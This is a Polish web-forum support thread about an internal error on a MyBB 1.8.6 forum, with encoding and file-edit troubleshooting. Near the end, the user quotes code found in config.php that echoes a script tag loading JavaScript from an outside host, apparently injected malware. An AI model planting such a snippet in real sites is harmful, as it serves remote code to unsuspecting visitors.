Wewnętrzny błąd MyBB

Błąd   Założony przez  niechce_sie_rejestrowac.

wersja skryptu MyBB: 1.8.6
adres forum: bo.vxm.pl
na czym polega problem (screen, opis, komunikaty): 
Wczoraj zacząłem edytować styl HTML5, dzisiaj wstałem i bum wywaliło wewnętrzny błąd MyBB (nie wiem czy moja edycja stylu ma z tym coś wspólnego ale może jednak) 
Wstawiam 2 Screeny jeden z strony głównej, a drugi z paneli admina 
       
edytowałeś to w plikach ?
Pomogłem i chcesz mi przyznać Punkt Reputacji? Proszę opisz w komentarzu za co go otrzymuję :) Dziękuje!  
Robiłeś cokolwiek z plikami functions.php i admin/index.php?
Bądź ogólnie z jakikolwiek plikiem wypisanym w błędach?
"Try not. Do... or do not. There is no try."
Poświęć 5 minut. Nie bądź ignorantem!  -  Jak zbadać element?
jeżeli tak to nie zapisałeś to pewnie w UTF-8 bez BOM
Pomogłem i chcesz mi przyznać Punkt Reputacji? Proszę opisz w komentarzu za co go otrzymuję :) Dziękuje!  
Nie, nie edytowałem żadnego pliku jedynie pliki css oraz szablon stylu header przez ACP

-----
Sprawdziłem pliki i wszystkie (które sprawdziłem) były zapisane w UTF-8 bez BOM.

Możliwe że wcześniej (miesiąc temu) coś w jakiś pliku edytowałem, ale do tego czasu się trzymało jeżeli był jakiś problem.

----
Po usunięciu linii 1861 w functions.php forum zaczyna działać normalnie (oczywiście oprócz ACP)
header($cookiefalse); 
Tylko po coś ten kod w funkcji był i wydaje mi się że usunięcie go nie rozwiąże problemu.

Po usunięciu linii 59 w admin/index.php pojawią się panel do logowania (domena.com/admin/) ale nie można się zalogować.
header("Content-type: text/html; charset={$lang->settings['charset']}"); 
(17.11.2015, 07:53)niechce_sie_rejestrowac napisał(a): Sprawdziłem pliki i wszystkie (które sprawdziłem) były zapisane w UTF-8 bez BOM.
sprobuj przez phpadmin zmienic szablon na inny
nie pamietam jak
ale jak widze po Twojej pisowni kodowanej to jakos nie bardzo widac abys nie namotal w pliku tekstowym i potem wkleil zawartos header do szablonu w pa,byc moze sprawdzales ale nie do konca jak nalezy
Jeśli sądzisz,ze czegoś nie ma,nie oznacza to,że tego nie można zobaczyć!
Pomoglem lajknij repa POMOGL :)
(17.11.2015, 21:18)fanson napisał(a):
(17.11.2015, 07:53)niechce_sie_rejestrowac napisał(a): Sprawdziłem pliki i wszystkie (które sprawdziłem) były zapisane w UTF-8 bez BOM.
sprobuj przez phpadmin zmienic szablon na inny
nie pamietam jak
ale jak widze po Twojej pisowni kodowanej to jakos nie bardzo widac abys nie namotal w pliku tekstowym i potem wkleil zawartos header do szablonu w pa,byc moze sprawdzales ale nie do konca jak nalezy
Szablon który edytowałem był używany tylko przeze mnie, domyślny styl jest ustawiony default i wydaje mi się że w tym wypadku tylko ja powianiem mieć problem(jeżeli się mylę to proszę poprawić mnie)
Odnośnie zmiany szablonu przez phpmyadmin to nic nie znalazłem
Zapisz plik inc/class_timers.php z kodowaniem UTF-8 bez BOM
   

Prawdopodobnie wszystkie pliki mam zapisane w formacie kodu UTF-8 bez BOM, dla pewności wgrałem czysty plik functions.php i oraz wszystkie pliki class_ które są zapisane z utf-8 bez bom.

-----
W pliku config.php znalazłem ciekawy kod :P 

if(empty($na)) {
$na "<script type=\"text/javascript\" src=\"http/mature.fastxblog.org/wp-content/themes/twentytwelve/gvldghvp.php?id=14078594\"></script>";
echo 
$na;

Niestety nadal logowanie nie działa.

----
Wgrałem wszystkie pliki na server od nowa i wszystko działa.



Użytkownicy przeglądający ten wątek:

1 gości